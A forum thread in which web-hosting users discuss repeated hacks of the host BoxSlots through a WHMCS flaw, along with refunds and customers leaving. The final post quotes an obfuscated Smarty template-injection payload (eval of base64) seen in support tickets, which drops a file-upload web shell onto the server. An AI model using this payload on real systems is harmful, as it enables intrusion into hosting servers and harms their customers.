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It happens, if Playstation can get exploited I am sure less successful companies can also be exploited. It's just a shame that people are doing it to good companies.
Yeah..this is sad...I have heard many good about Boxslot..Sad ! they are under attack...hope they will fix & secure their stuff...Good Luck to them.

One more site Mxzon's Server hacked.
you ask for refund directly to rk or paypal?

i asked rk and other then they all says NO, so i was about to make a call to paypal(i told them that) then they say kk we are refunding you...

if they so no or not refunding you. call PP ;) fastest you can.

if you used there host for more days then what there TOS says, then don't asked for refund. (i was with them for like less then 24hrs)
hmmm i wont release the code of how to exploit it.. But moneybookers and alertpay have exploited codes from the whmcs api.php... Even if it is not enabled it can still be exploited...

All hosts are vulnerable i believe very few have patched it without telling anyone..

Low level attacks can make free paid accounts as in it will show paid but it wasnt...

The smarter non script kiddies can inject shell commands directly as whmcs has root privileges
It Isn't bs,they are a host and everyhost has downtime.It can be caused due by a datacenter error or other ways in which the host has no control of.If you all want 100% uptime,get a cloud server or something for your warez files. xD
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Well atleast i can say , Boxslots is not running away like anyone , else they could have left after 2 successful attacks with all servers wiped ? They are helping in every installs and every setup they can , Believe me , no hosts wants to get hacked itself , it seems someone is getting jealous for getting all RS clients probably .
We're not going down, all I can say in this situation, if you hate us, well I guess you hate us. We can't change your minds. I just want to provide a decent service for everyone, not start a war.
From my look BoxSlots got the most clients of RapidSpeeds because of:

1) they are running for some time already
2) they are cheap
3) very good support

So people were like "hey, they are here for few months, there are good references and prices are great too".

I think if other hosts would do like big promo week ago, they would get some more people from RS. But hey, I'm not host. It's just my opinion.

Anyway, I would love to stick up with BoxSlots but my members are more important and I don't want to loose them. I'm really sorry, guys. :(
Well like i said in the first post 99% of hosts here use whmcs - even smaller & noob companies that know little about security , yet nobody reported any hacking in the last few days/weeks.

If it was just random , dozen of other hosts would have been hacked as well.

+ same company twice in the same week....hmmm

People have tried to hack my WHMCS all day today. with the same exploit its getting annoying to log in to the ticket: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php})
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